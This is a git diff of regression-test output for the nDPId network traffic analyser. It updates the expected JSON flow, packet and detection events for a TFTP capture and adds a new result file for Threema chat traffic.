+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":946730124846,"pkt":"AFCN14tDAAu+GJpACABFAAAgAAEAAP8ROXTAqAD9wKgACsW6DXUADKpJAAQAAQAAAAAAAAAAAAAAAAAA"} +01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946730124846,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkycAAIARI07AqAAKwKgA\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"} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 
+00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":102,"packets-processed":101,"total-skipped-flows":0,"total-l4-payload-len":25039,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":946733724846} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946733724846,"flow_last_seen":946733724846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54627,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946733724846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":946733724846,"pkt":"9Opn97JCCAAnntJbCABFAAAv+hlAAEAR3pisHAQ1rBAFqtVjAEUAGx52AAFzeXNtYW4ubGlzAG9jdGV0AA=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946733724846,"flow_last_seen":946733724846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54627,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54626,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 
+00790{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54632,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":24991,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":103,"packets-processed":102,"total-skipped-flows":0,"total-l4-payload-len":25058,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":946737844630} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946737844630,"flow_last_seen":946737844630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":946737844630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946737844630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946737844630,"pkt":"eCSvPj0DAFBWn8+KCABFAAAuYudAAEARdJqsHAVbrBwFqq5KAEUAGkfgAAJ6ei5iaW4AbmV0YXNjaWkA"} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946737844630,"flow_last_seen":946737844630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":946737844630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946737844631,"flow_last_seen":946737844631,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":946737844631,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946737844631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":946737844631,"pkt":"AFBWn8+KeCSvPj0DCABFAAAgqt8AAEARbLCsHAWqrBwFW\/JqrkoADPveAAQAAA=="} +01206{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946737844632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946737844632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYuhAAEARcqesHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} 
+01206{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946737844632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946737844632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYulAAEARcqasHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946737844631,"flow_last_seen":946737844632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946737844631,"flow_last_seen":946737844632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946733724846,"flow_last_seen":946733724846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54627,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946737844630,"flow_last_seen":946737844630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":946737844632,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":107,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":107,"packets-processed":107,"total-skipped-flows":0,"total-l4-payload-len":26116,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":946737844632} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 104/104 +~~ packets captured/processed: 107/107 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 26069 bytes -~~ total detected protocols..: 4 -~~ total active/idle flows...: 4/4 +~~ total layer4 data length..: 26116 bytes +~~ total detected protocols..: 7 +~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875639 bytes -~~ total memory freed........: 5875639 bytes -~~ total allocations/frees...: 118230/118230 +~~ total memory allocated....: 6012658 bytes +~~ total memory freed........: 6012658 bytes +~~ total allocations/frees...: 121009/121009 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 444 chars -~~ json string max len.......: 1213 chars -~~ json string avg len.......: 827 chars +~~ json string min len.......: 442 chars +~~ json string max len.......: 1211 chars +~~ json string avg len.......: 825 chars diff --git a/test/results/threema.pcap.out b/test/results/threema.pcap.out new file mode 100644 index 000000000..5631fcbb9 --- /dev/null +++ b/test/results/threema.pcap.out 
@@ -0,0 +1,57 @@ +00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"threema.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"threema.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655301424082} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655301424082,"flow_last_seen":1655301424082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655301424082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50298,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655301424082,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301424082,"pkt":"eJS0JASgYDjgxTWgCABFAAA8sOJAAD8GIgbAqAJkuVjsbsR6FGaFcI59AAAAAKAC\/\/+zrwAAAgQFtAQCCAoADj6fAAAAAAEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655301424108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301424108,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxHpp4+23hXCOfqAS\/\/9\/CwAAAgQFrAEDAwYEAggK7ZTvbAAOPp8="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655301424111,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655301424111,"pkt":"eJS0JASgYDjgxTWgCABFAAA0sONAAD8GIg3AqAJkuVjsbsR6FGaFcI5+aePtuIAQAVescAAAAQEICgAOPqbtlO9s"} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655301424082,"flow_last_seen":1655301470737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":817,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1655301470737,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50298,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655301591783,"flow_last_seen":1655301591783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655301591783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50484,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1655301591783,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301591783,"pkt":"eJS0JASgYDjgxTWgCABFAAA89dRAAD8G3RPAqAJkuVjsbsU0FGbdvRewAAAAAKAC\/\/8tsAAAAgQFtAQCCAoADuJkAAAAAAEDAwg="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655301591807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301591807,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxTS\/ZrJg3b0XsaAS\/\/\/aLAAAAgQFrAEDAwYEAggKjwRSsAAO4mQ="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655301591810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655301591810,"pkt":"eJS0JASgYDjgxTWgCABFAAA09dVAAD8G3RrAqAJkuVjsbsU0FGbdvRexv2ayYYAQAVcHkgAAAQEICgAO4muPBFKw"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655301591783,"flow_last_seen":1655301594185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":825,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1655301594185,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50484,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655301676958,"flow_last_seen":1655301676958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655301676958,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50500,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1655301676958,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301676958,"pkt":"eJS0JASgYDjgxTWgCABFAAA8OhtAAD8GmM3AqAJkuVjsbsVEFGa+1hz1AAAAAKAC\/\/8CuAAAAgQFtAQCCAoADybuAAAAAAEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1655301676985,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655301676985,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxUQ+t0LhvtYc9qAS\/\/88cwAAAgQFrAEDAwYEAggKDbs26gAPJu4="} 
